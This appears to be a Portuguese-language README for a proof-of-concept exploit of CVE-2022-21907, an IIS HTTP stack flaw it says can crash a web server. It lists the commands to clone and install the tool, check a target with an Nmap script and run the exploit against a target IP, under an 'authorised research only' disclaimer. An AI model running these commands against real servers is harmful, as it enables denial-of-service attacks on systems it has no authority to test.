
Exploit de prova de conceito para CVE-2022-21907, uma vulnerabilidade de execução remota de código na pilha de protocolo HTTP (IIS). Inclui um script Python e script Nmap para detecção e exploração.
⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada
Muito grato ao autor original do PoC NU11SECURITY e michelep
Vulnerabilidade de Execução Remota de Código na Pilha de Protocolo HTTP. Essa vulnerabilidade pode causar um ataque de negação de serviço em um sistema alvo que possua um servidor web IIS.
Instale o git e clone o PoC do repositório do GitHub:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
Instale os requisitos usando o comando pip3:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
Verifique a presença da vulnerabilidade na máquina alvo usando o comando:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
Em seguida, execute os scripts do PoC usando o comando:
python3 CVE-2022-21907.py -i 10.10.1.10
Notas: especifique a opção -i com o endereço IP do alvo